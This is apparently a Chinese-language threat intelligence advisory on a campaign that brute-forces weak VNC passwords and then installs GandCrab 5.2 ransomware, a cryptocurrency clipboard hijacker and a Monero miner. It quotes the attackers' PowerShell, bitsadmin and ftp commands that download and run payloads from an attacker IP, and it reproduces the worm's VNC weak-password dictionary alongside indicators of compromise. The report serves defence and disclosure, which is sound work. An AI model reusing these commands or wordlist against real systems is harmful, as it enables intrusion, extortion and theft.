“VNC劫匪”攻击预警：中招企业遭遇GandCrab 5.2等多种病毒连环暴击

一、背景

腾讯御见威胁情报中心发现一起针对远程管理工具VNC进行大范围扫描探测，攻击者使用弱口令字典对运行VNC服务的机器进行爆破连接。爆破成功后，该团伙会在中招企业网络中运行多种病毒木马，包括GandCrab 5.2勒索病毒、门罗币挖矿木马、数字货币钱包劫持木马等均被下载运行，腾讯御见威胁情报中心将该团伙命名为“VNC劫匪”。

VNC是被广泛使用的远程管理工具，若使用者为图方便仅使用简单密码，就会给“VNC劫匪”的攻击以可趁之机。“VNC劫匪”攻击得手势必会造成服务器被黑客远程控制，信息泄露也就必然发生。

攻击者可能根据服务器的价值不同下载运行不同的木马：比如，在高价值服务器上下载运行GandCrab 5.2勒索病毒加密重要系统资料实施敲诈勒索；若攻破有数字货币交易的电脑，则运行数字货币钱包劫持木马抢钱；若被攻击的只是普通电脑，没有勒索价值则被植入门罗币挖矿木马，成为“VNC劫匪”控制的矿工电脑。

腾讯安全专家建议采用VNC远程管理工具的企业网管尽快修改管理员密码，永远不要使用弱密码配置远程管理工具。一旦被黑客暴力破解，将会给企业造成难以挽回的损失。

二、技术分析

2.1.爆破攻击

VNC是一款被广泛应用的远程控制管理工具，使用RFB协议进行屏幕画面分享及远程操作，通过VNC可以让用户在任何地方访问和控制远程桌面应用程序。黑客针对VNC进行弱口令爆破连接，然后执行命令下载木马植入。

攻击样本执行后拷贝文件到windows目录C:\Windows\4636436463467537357\winsecmgrv.exe

写注册表添加为启动项

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Security Svcscs

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Security Svcscs

在while循环中生成随机IP地址，生成IP地址时，使用例如A.B.C.D格式中A段范围30-209，B、C、D段范围1-255，并去掉包含局域网IP地址的127、172、192网段IP，然后为生成的IP创建线程进行爆破攻击。

开始攻击前测试IP是否可以建立VNC默认端口5900的连接，并获取可用的套接字数量，若可用套接字数量大于零则使用内置的VNC弱口令进行登录

使用内置VNC弱口令字典

爆破时通过VNC的RFB协议建立连接

发起攻击时的网络数据

爆破攻击成功则通过cmd执行命令下载木马wuh.exe植入，植入木马时依次通过三种方式：利用Powershell下载执行、利用bitsadmin下载执行、利用ftp脚本下载执行(将ftp.exe的防火墙规则设置为允许通过)

命令1：

cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile(,27h,hxxp://92.63.197.153/wuh.exe,%temp%\496004393050.exe,27h,);Start-Process ,27h,%temp%\496004393050.exe

命令2：

cmd.exe /c bitsadmin /transfer getitman /download /priority high hxxp://92.63.197.153/wuh.exe %temp%\49506069403.exe&start %temp%\49506069403.exe,0

命令3：

cmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule name="ok" dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes,0

cmd.exe /c "cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get wuh.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start wuh.exe"

2.2. GandCrab 勒索病毒

爆破攻击后植入的文件muh.exe为近期十分流行的勒索病毒GandCrab V5.2版本，病毒运行后会将电脑上的文档、图片、数据库等大量的重要文件进行加密并进行勒索，提示通过访问Tor节点：hxxp://gandcrabmfe6mnef.onion/a10a45ae44a96a6e可获取付费介绍和免费解密一个文件。

详细分析参考：《勒索病毒GandCrab 5.2紧急预警：冒充公安机关进行鱼叉邮件攻击》https://mp.weixin.qq.com/s/g1JMjRRiT7lMLDFa4of00A

2.3.  关联分析

通过关联分析发现，通过同一地址(92.63.197.153)，同一攻击方式(VN爆破)进行传播的除了GandCrab勒索病毒外还有数字货币钱包劫持木马、门罗币挖矿木马，这些木马文件在服务器上的文件名为1.exe、2.exe、3.exe等。黑客在VNC爆破攻击成功后，通过downloader木马进行下载植入到中招电脑。

2.4.  钱包劫持

木马下载地址hxxp:// 92.63.197.153/1.exe，该木马运行后循环开剪切板并获取其中内容

按照格式匹配比特币、门罗币、以太坊等12种数字货币钱包地址，匹配到之后将内置的钱包地址进行替换，劫持交易过程中的收益，使用的钱包地址如下：

1EN3bbs8UdVWA3i3ixtB9jQWvPnP9us4va

qrwtjnq8724e4eht9xj5ps4pqn0thxkzkgrwm28qk3

24fVJSDuRdQ9pLqBFaB8bVZ5vMz8ympPbRRm9bf61Hk9EjNb2iL8JAUFr6MNqj3PGR4PGXzCGYQw7UemxRoRxCC97oxADVN

XbRXpWWLbZRyrsGU4SbHYT2yjvmi8p5UNV

DTKLY1JtQTAKjuKAJrjsbrjhSmkFtsKvNV

EbMpWJ7mrq8mPjfc28xJJew1fCLpABc9Ro

0xb6d8926bf0418de68a7544c717bbb4ea198769cc

Lcxcmpj9FZ7Sso8WWsED3h6bZMLYRLcJAh

49n2ySeucB3F4ni2q6So4uNfPbTmLVSNadrHzduqDJXKMDZWnv6VyTYiq4MdEF7jDdCkx9Vkk7gkyGaJs3DiS8TjJQm7cR8

PUJeZbWdjX1pcF6zcvxTynGER1PKpvx3hX

rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ

t1UTEJ9Sv8PCTb72xCkRxc6GiE1cFpANSQ4

目前能查询到比特币钱包接收到0.094BTC，以太坊钱包接收到0.186ETH，收益还不够大，证明“VNC劫匪”黑客团伙的活动才刚刚开始。

2.5. 挖矿木马

木马下载地址hxxp:// 92.63.197.153/2.exe,该木马运行后拷贝自身到C:\ProgramData\nEzJvZquBf\ windvcmgr.exe，并释放base64加密的挖矿配置文件cfg/cfgi

配置文件解密内容，可以看到挖矿矿池地址为：

92.63.197.153:7575

登录用户名：cb946e0c-6c88-4e11-881b-56f7ecbda229

创建指向挖矿木马的快捷方式，并将快捷方式添加到开始菜单启动

然后将门罗币挖矿代码注入notepad进程进行挖矿

三、安全建议

1.   采用高强度的密码，避免使用弱口令密码，并定期更换密码。建议服务器密码使用高强度且无规律密码，并且强制要求每个服务器使用不同密码管理。

2.   对没有互联需求的服务器/工作站内部访问设置相应控制，避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。

3.   对重要文件和数据（数据库等数据）进行定期非本地备份。

4.   企业用户可在服务器部署腾讯御点终端安全管理系统防范此类病毒入侵。

IOCs

feb8b98d319b6377cd1701decf075d03

f4926ebd721231a04ccc053ba19b9ace

d754256f4758f07b263db0f97c9757e8

3edbca6a02ec2007493fc5fa01ad5093

3a107ad52d454cef69ef95481b27b9e6

cabe7d06f7e01ce4defeb28cbef8f6b4

4467d13fc43281c1767307860a9f7c17

e387bd817e9b7f02fa9c2511cc345f12

7863261cd36717d171825bd82244424d

f8edf799e18062480587d31ed010aec5

4397481fbfffaee44195e0ba8ea8dad5

cfa407c597a0a9edc9f03d38c3078b3c

0f8c6e70d2847d8b77e33b67da163170

d5a5deeacd3f51523092967b7a011804

6ff47ee58649855896cb4d12df89fe81

b57ed88703d7afbbb34d30ab5812ec5e

IP

92.63.197.153

Domain

rghirgsrogrshggir.ru

rghirgsrogrshghsh.ru

rghirgsrogrstjgrr.ru

rghirgsrogddhjtdj.ru

rghirgsrsrgsreidg.ru

rghirgsrfzjjfsrzj.ru

rghirgsrogrsfzjfs.ru

rghirgsrogrsfsegh.ru

rghirgsrogrhdthsr.ru

rghirgsrogrefsesg.ru

rghirgsrogrshggirr.su

rghirgsrogrshghshr.su

rghirgsrogrstjgrrr.su

rghirgsrogddhjtdjr.su

rghirgsrsrgsreidgr.su

rghirgsrfzjjfsrzjr.su

rghirgsrogrsfzjfsr.su

rghirgsrogrsfseghr.su

URL

hxxp:// 92.63.197.153/1.exe

hxxp:// 92.63.197.153/2.exe

hxxp:// 92.63.197.153/3.exe

hxxp:// 92.63.197.153/4.exe

hxxp:// 92.63.197.153/5.exe

hxxp:// 92.63.197.153/wuh.exe

钱包：

1EN3bbs8UdVWA3i3ixtB9jQWvPnP9us4va

qrwtjnq8724e4eht9xj5ps4pqn0thxkzkgrwm28qk3

24fVJSDuRdQ9pLqBFaB8bVZ5vMz8ympPbRRm9bf61Hk9EjNb2iL8JAUFr6MNqj3PGR4PGXzCGYQw7UemxRoRxCC97oxADVN

XbRXpWWLbZRyrsGU4SbHYT2yjvmi8p5UNV

DTKLY1JtQTAKjuKAJrjsbrjhSmkFtsKvNV

EbMpWJ7mrq8mPjfc28xJJew1fCLpABc9Ro

0xb6d8926bf0418de68a7544c717bbb4ea198769cc

Lcxcmpj9FZ7Sso8WWsED3h6bZMLYRLcJAh

49n2ySeucB3F4ni2q6So4uNfPbTmLVSNadrHzduqDJXKMDZWnv6VyTYiq4MdEF7jDdCkx9Vkk7gkyGaJs3DiS8TjJQm7cR8

PUJeZbWdjX1pcF6zcvxTynGER1PKpvx3hX

rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ

t1UTEJ9Sv8PCTb72xCkRxc6GiE1cFpANSQ4

矿池：

92.63.197.153:7575

VNC弱口令

1234

12345

123456

1234567

12345678

123123

12341234

54321

654321

321

321321

1234qwer

password

Password

passwd

pass

pass123

admin

admin1

Admin

ADMIN

admin123

abc

abcabc

abc123

abcd

abcd1234

abcde

asd

asdf

auth

login

qwerty

qwe123

1q2w3e

q1w2e3r

office

vnc

vnc123

account

vncvnc

VNC

user

user123

User

test

testtest

test123

testing

server

Server

computer

pc

guest

homeuser

info

oracle

internet

control

desktop

windows

monitor

chageme

temp

manager

owner

secure

usuario

benutzer

utente

parola

passwort

geslo